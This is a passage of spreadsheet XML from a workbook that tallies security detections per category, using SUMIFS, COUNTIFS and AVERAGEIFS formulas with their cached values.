        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR8)</f>
        <v>3</v>
      </c>
      <c r="AS10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS8)</f>
        <v>0</v>
      </c>
      <c r="AT10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT8)</f>
        <v>1</v>
      </c>
      <c r="AU10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU8)</f>
        <v>2</v>
      </c>
      <c r="AV10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV8)</f>
        <v>1</v>
      </c>
      <c r="AW10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW8)</f>
        <v>1</v>
      </c>
      <c r="AX10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX8)</f>
        <v>1</v>
      </c>
      <c r="AY10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY8)</f>
        <v>1</v>
      </c>
      <c r="AZ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ8)</f>
        <v>3</v>
      </c>
      <c r="BA10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA8)</f>
        <v>1</v>
      </c>
      <c r="BB10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB8)</f>
        <v>3292</v>
      </c>
      <c r="BC10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC8)</f>
        <v>5180</v>
      </c>
      <c r="BD10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD8)</f>
        <v>0</v>
      </c>
      <c r="BE10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE8)</f>
        <v>0</v>
      </c>
      <c r="BF10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF8)</f>
        <v>10</v>
      </c>
      <c r="BG10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG8)</f>
        <v>0</v>
      </c>
      <c r="BH10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH8)</f>
        <v>2</v>
      </c>
      <c r="BI10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI8)</f>
        <v>1</v>
      </c>
      <c r="BJ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ8)</f>
        <v>0</v>
      </c>
      <c r="BK10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK8)</f>
        <v>1</v>
      </c>
      <c r="BL10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL8)</f>
        <v>1</v>
      </c>
      <c r="BM10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM8)</f>
        <v>0</v>
      </c>
      <c r="BN10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN8)</f>
        <v>2</v>
      </c>
      <c r="BO10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO8)</f>
        <v>123</v>
      </c>
      <c r="BP10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP8)</f>
        <v>0</v>
      </c>
      <c r="BQ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ8)</f>
        <v>1</v>
      </c>
      <c r="BR10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR8)</f>
        <v>1</v>
      </c>
      <c r="BS10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS8)</f>
        <v>1</v>
      </c>
      <c r="BT10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT8)</f>
        <v>0</v>
      </c>
      <c r="BU10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU8)</f>
        <v>1</v>
      </c>
      <c r="BV10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV8)</f>
        <v>1</v>
      </c>
      <c r="BW10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW8)</f>
        <v>1</v>
      </c>
      <c r="BX10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX8)</f>
        <v>1</v>
      </c>
      <c r="BY10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY8)</f>
        <v>1</v>
      </c>
      <c r="BZ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ8)</f>
        <v>1</v>
      </c>
      <c r="CA10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA8)</f>
        <v>0</v>
      </c>
      <c r="CB10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB8)</f>
        <v>5</v>
      </c>
      <c r="CC10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC8)</f>
        <v>1</v>
      </c>
      <c r="CD10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD8)</f>
        <v>3</v>
      </c>
      <c r="CE10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE8)</f>
        <v>2</v>
      </c>
      <c r="CF10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF8)</f>
        <v>1</v>
      </c>
      <c r="CG10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG8)</f>
        <v>0</v>
      </c>
      <c r="CH10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH8)</f>
        <v>65839</v>
      </c>
      <c r="CI10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI8)</f>
        <v>1002</v>
      </c>
      <c r="CJ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ8)</f>
        <v>0</v>
      </c>
      <c r="CK10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK8)</f>
        <v>1</v>
      </c>
      <c r="CL10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL8)</f>
        <v>0</v>
      </c>
      <c r="CM10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM8)</f>
        <v>1</v>
      </c>
      <c r="CN10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN8)</f>
        <v>2</v>
      </c>
      <c r="CO10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO8)</f>
        <v>0</v>
      </c>
      <c r="CP10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP8)</f>
        <v>0</v>
      </c>
      <c r="CQ10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ8)</f>
        <v>0</v>
      </c>
      <c r="CR10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR8)</f>
        <v>0</v>
      </c>
      <c r="CS10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS8)</f>
        <v>2</v>
      </c>
      <c r="CT10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT8)</f>
        <v>1</v>
      </c>
      <c r="CU10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU8)</f>
        <v>1</v>
      </c>
      <c r="CV10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV8)</f>
        <v>0</v>
      </c>
      <c r="CW10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW8)</f>
        <v>450</v>
      </c>
      <c r="CX10" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX8)</f>
        <v>112</v>
      </c>
      <c r="CY10" s="603">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY8)</f>
        <v>11</v>
      </c>
      <c r="CZ10" s="173"/>
      <c r="DA10" s="173"/>
      <c r="DB10" s="173"/>
      <c r="DC10" s="616" t="s">
        <v>2013</v>
      </c>
      <c r="DD10" s="617">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC10,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>6</v>
      </c>
      <c r="DE10" s="618">
        <v>6.0</v>
      </c>
      <c r="DF10" s="336">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="DG10" s="173">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="DH10" s="337">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="DI10" s="607">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="DJ10" s="608">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="DK10" s="609">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="DL10" s="455">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="DM10" s="610"/>
      <c r="DN10" s="610"/>
      <c r="DO10" s="619" t="s">
        <v>2013</v>
      </c>
      <c r="DP10" s="620">
        <f>DD10/1</f>
        <v>6</v>
      </c>
      <c r="DQ10" s="173"/>
      <c r="DR10" s="619" t="s">
        <v>2013</v>
      </c>
      <c r="DS10" s="620">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="DT10" s="173"/>
      <c r="DU10" s="173"/>
      <c r="DV10" s="173"/>
      <c r="DW10" s="173"/>
      <c r="DX10" s="173"/>
      <c r="DY10" s="173"/>
      <c r="DZ10" s="173"/>
      <c r="EC10" s="173"/>
      <c r="ED10" s="621">
        <f>AVERAGEIFS(EJ11:EJ147,'(B) - Detecciones - Ataques'!AG3:AG139,"LV1",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>0.4290586194</v>
      </c>
      <c r="EE10" s="621">
        <f>AVERAGEIFS(EK11:EK147,'(B) - Detecciones - Ataques'!AG3:AG139,"LV1",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>0.06557446579</v>
      </c>
      <c r="EF10" s="621">
        <f>AVERAGEIFS(EJ11:EJ147,'(B) - Detecciones - Ataques'!AG3:AG139,"LV2",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>0.1111111111</v>
      </c>
      <c r="EG10" s="621">
        <f>AVERAGEIFS(EK11:EK147,'(B) - Detecciones - Ataques'!AG3:AG139,"LV2",'(B) - Detecciones - Ataques'!IS3:IS139,"✔")</f>
        <v>0.5245043023</v>
      </c>
      <c r="EH10" s="173"/>
      <c r="EI10" s="173"/>
      <c r="EJ10" s="403" t="s">
        <v>2657</v>
      </c>
      <c r="EK10" s="403" t="s">
        <v>2658</v>
      </c>
      <c r="EL10" s="173"/>
      <c r="EM10" s="622"/>
      <c r="EN10" s="173"/>
      <c r="EO10" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="EP10" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO10)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO10 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="EQ10" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO10)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO10 &amp; "*")</f>
        <v>6</v>
      </c>
      <c r="ER10" s="623">
        <f t="shared" ref="ER10:ER12" si="9">EP10/EQ10</f>
        <v>0.6666666667</v>
      </c>
      <c r="ES10" s="401"/>
      <c r="ET10" s="402"/>
      <c r="EV10" s="173"/>
      <c r="EW10" s="20" t="s">
        <v>2659</v>
      </c>
      <c r="EX10" s="173">
        <f>SUM('(B) - Detecciones - Ataques'!HP3:HP139)</f>
        <v>1504</v>
      </c>
      <c r="EZ10" s="173"/>
      <c r="FA10" s="173"/>
      <c r="FB10" s="173"/>
      <c r="FC10" s="173"/>
      <c r="FD10" s="173"/>
      <c r="FE10" s="173"/>
      <c r="FF10" s="173"/>
      <c r="FG10" s="173"/>
      <c r="FH10" s="173"/>
      <c r="FI10" s="173"/>
      <c r="FJ10" s="173"/>
      <c r="FK10" s="173"/>
      <c r="FN10" s="20" t="s">
        <v>2457</v>
      </c>
      <c r="FO10" s="20" t="s">
        <v>2458</v>
      </c>
      <c r="FP10" s="20" t="s">
        <v>2459</v>
      </c>
      <c r="FQ10" s="20" t="s">
        <v>2460</v>
      </c>
      <c r="FR10" s="20" t="s">
        <v>2660</v>
      </c>
      <c r="FS10" s="173"/>
      <c r="FT10" s="173"/>
      <c r="FU10" s="173"/>
      <c r="FV10" s="173"/>
      <c r="FW10" s="173"/>
      <c r="FX10" s="173"/>
    </row>
    <row r="11">
      <c r="D11" s="352" t="s">
        <v>2466</v>
      </c>
      <c r="E11" s="404" t="s">
        <v>2467</v>
      </c>
      <c r="F11" s="387"/>
      <c r="G11" s="505" t="s">
        <v>2661</v>
      </c>
      <c r="H11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,H8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; H8 &amp; "*") </f>
        <v>637</v>
      </c>
      <c r="I11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,I8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; I8 &amp; "*") </f>
        <v>373</v>
      </c>
      <c r="J11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,J8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; J8 &amp; "*") </f>
        <v>123</v>
      </c>
      <c r="K11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,K8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; K8 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="L11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,L8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; L8 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="M11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,M8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; M8 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="N11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,N8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; N8 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="O11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,O8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; O8 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="P11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,P8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; P8 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="Q11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Q8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Q8 &amp; "*") </f>
        <v>15</v>
      </c>
      <c r="R11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,R8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; R8 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="S11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S8 &amp; "*") </f>
        <v>178</v>
      </c>
      <c r="T11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T8 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="U11" s="625">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U8 &amp; "*") </f>
        <v>115</v>
      </c>
      <c r="W11" s="505" t="s">
        <v>2661</v>
      </c>
      <c r="X11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,X8)</f>
        <v>636</v>
      </c>
      <c r="Y11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Y8)</f>
        <v>1</v>
      </c>
      <c r="Z11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Z8)</f>
        <v>0</v>
      </c>
      <c r="AA11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AA8)</f>
        <v>0</v>
      </c>
      <c r="AB11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AB8)</f>
        <v>373</v>
      </c>
      <c r="AC11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AC8)</f>
